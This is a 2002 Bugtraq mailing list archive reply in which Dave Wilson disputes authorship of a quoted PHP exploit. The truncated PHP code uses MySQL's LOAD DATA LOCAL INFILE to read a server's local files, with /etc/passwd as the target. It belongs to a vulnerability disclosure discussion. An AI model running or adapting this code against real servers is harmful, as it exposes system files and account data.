Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: File reading vulnerable in PHP and MySQL (Local Exploit)

From: Dave Wilson <dw () botanicus net>
Date: Wed, 27 Nov 2002 09:54:58 +0000
Hi there,

Please see http://botanicus.net/dw/sec.html - I wrote about this in
February. Prior to that, other people have claimed to have come across
this too.

On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:


Attacker can use PHP and mySQL to read some local file following this way:

# Create a database (mySQL) and upload this file to your server
PHP Code: viewfile.php (programmed by Luke)

======================================================
<?
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd"; // filename that you wanna view 

// shell code
        echo "<pre>";

                                mysql_connect ($dbhost, $dbuser, 
$dbpasswd);
                                $sql = array (
                                   "USE $dbname",

                                   'CREATE TEMPORARY TABLE ' . ($tbl 
= 'A'.time
()) . ' (a LONGBLOB)',

                                   "LOAD DATA LOCAL INFILE '$file' INTO 
TABLE
$tbl FIELDS "
                                   . "TERMINATED BY      
'__THIS_NEVER_HAPPENS__' "
                                   . "ESCAPED BY          '' "
                                   . "LINES TERMINATED BY
'__THIS_NEVER_HAPPENS__'",

                                   "SELECT a FROM $tbl LIMIT 1"
                                );



Umm, this is my code. Please check any good Bugtraq archive for proof of
this fact. This is pretty much identical, except my English is better
:-).


Luke (HVA)
http://www.hackervn.net


Dave Wilson.
Previous By Date Next
Previous By Thread Next

Current thread: